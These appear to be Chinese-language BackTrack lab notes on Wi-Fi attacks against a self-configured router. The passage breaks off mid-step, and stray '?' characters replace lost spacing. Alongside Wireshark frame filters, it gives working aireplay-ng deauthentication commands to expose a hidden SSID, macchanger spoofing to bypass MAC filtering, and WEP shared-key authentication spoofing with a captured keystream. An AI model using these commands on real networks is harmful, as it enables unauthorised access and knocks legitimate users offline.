BackTrack破解.docx

一：wireshark 使用方法查看Wlan管理帧 ? ? ????????????????????wlan.fc.type==0查看Wlan控制帧 ? ? ????????????????????wlan.fc.type==1查看Wlan数据帧 ? ????????????????????? wlan.fc.type==2查看特定bssid的非beacon帧 ? ?（wlan.bssid == ?B0:48:7A:1A:EB:D4） ！（wlan.fc.type_subtype == 0x08)二：命令行连接网络方法：1：配置无线安全配置为不加密；2：连接命令：iwconfig wlan2 ?essid WlabLab3: ? DHCP: dhclient4: ? 查看命令：ifconfig wlan2?5：加密连接如果自动分配地址不成功，手动分配地址：ifconfig wlan2 ?192.168.1.11 netmask 255.255.255.0手动修改DNS：编辑/etc/resolv.conf文件设置DNS服务器地址nameserver ? 192.168.1.1三：隐藏SSID攻击方法：1：隐藏前可以用wireshark在Beacon frames包看见，及可以在网络连接看见。（3个截图）1) airodump-ng mon02) wireshark? ? 3) 网卡显示有其他网络出现2：去除路由器的广播SSID功能，步骤与图3：被动监听接收，等待该AP客户端的接入，? ? ? wlan.bssid == ?B0:48:7A:1A:EB:D4?4：主动应用下线攻击，迫使与该AP相连的用户下线，再连接。? ? ? 攻击命令：aireplay-ng -0 5 -a?B0:48:7A:1A:EB:D4 mon0? ? ? ? ? ? ? ? ? ? ? ? ?aireplay-ng --deauth 5 -a?B0:48:7A:1A:EB:D4 mon0? ? ? 如果不成功，根据提示修改网卡的工作频道：iwconfig mon0 channel 2? ? ? ?-0 ?选择Deauthentication attack ? ?5表示发5个包? ? ? ?-a ?目标的mac 地址5: ? 打开wireshark监听。? ? ? ?（wlan.bssid == ?B0:48:7A:1A:EB:D4） ！（wlan.fc.type_subtype == 0x08)四：地址过滤攻击方法：1：配置无线安全配置为不加密； ? ? ? ?2：配置路由器地址过滤；3：测试不是绑定的IP是否能连接；? ? ? iwconfig wlan2 essid WlanLab4: ?监控与该路由器连接的客户端Mac地址? ? ?airodump-ng mon05：修改本地网卡的mac地址为绑定的Mac地址? ? ?ifconfig wlan2 down? ? ?macchange ?-m?48:5D:60:3B:7E:33 wlan2? ? ?ifconfig wlan2 up6: ?连接AP? ? ?连接：iwconfig wlan2 ?essid WlabLab? ? ?自动分配地址： dhclient7: ?测试是否能连接? ? ?iwconfig wlan2? ? ?ping 192.168.1.1五：共享密钥认证攻击方法原理：? ?? ? ? ?安全分析：攻击者可以被动的监听到传送明文及加密后的明文，可以通过异或运算出密码流，此密码流被用来加密任何由AP送来的验证明文，这样有了密码流就无需真正的密码。? ? ? ?攻击过程：? ? ? ?1：配置路由器为WEP共享密钥加密，密码为1111111111? ? ? ?2：监听客户端与AP连接时的密码流,如果长时间没有，可以应用deauthencation攻击迫使client下线。? ? ? ? ? ? ?airodump-ng mon0 ?-c 6 --bssid?B0:48:7A:1A:EB:D4 -w keystream；? ? ? ?3：查看keystream-01-B0-48-7A-1A-EB-D4.xor文件是否生成；? ? ? ?4：打开wireshark ,wlan.addr== aa:aa:aa:aa:aa:aa ,伪造共享认证，连接AP? ? ? ? ? ? aireplay-ng -1 0 -e WlavLab -y?keystream-01-B0-48-7A-1A-EB-D4.xor -a?B0:48:7A:1A:EB:D4 -h aa:aa:aa:aa:aa:aa? ? ? ?5: ?查看路由器主机状态;? ? ? ?6: ?查看捕获的包，检查认证成功与连接成